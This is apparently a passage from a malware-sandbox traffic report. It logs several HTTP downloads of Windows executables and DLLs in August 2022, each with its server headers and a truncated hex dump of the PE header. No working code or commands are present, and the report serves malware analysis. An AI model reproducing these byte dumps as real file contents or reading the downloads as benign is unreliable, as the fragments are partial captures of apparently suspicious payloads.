21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:15 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:16 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:17 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:17 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:18 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 04:53:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 11 Aug 2022 04:50:05 GMTETag: "7ac00-5e5efe634a121"Accept-Ranges: bytesContent-Length: 502784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 92 05 00 00 16 02 00 00 00 00 00 4c a0 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 7e 21 00 00 00 a0 06 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 f0 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 91 05 00 00 10 00 00 00 92 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 68 12 00 00 00 b0 05 00 00 14 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 4d 0c 00 00 00 d0 05 00 00 00 00 00 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 7e 21 00 00 00 e0 05 00 00 22 00 00 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 f0 6b 00 00 00 30 06 00 00 6c 00 00 00 ce 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 72 01 00 00 a0 06 00 00 72 01 00 00 3a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 00 00 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:01 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 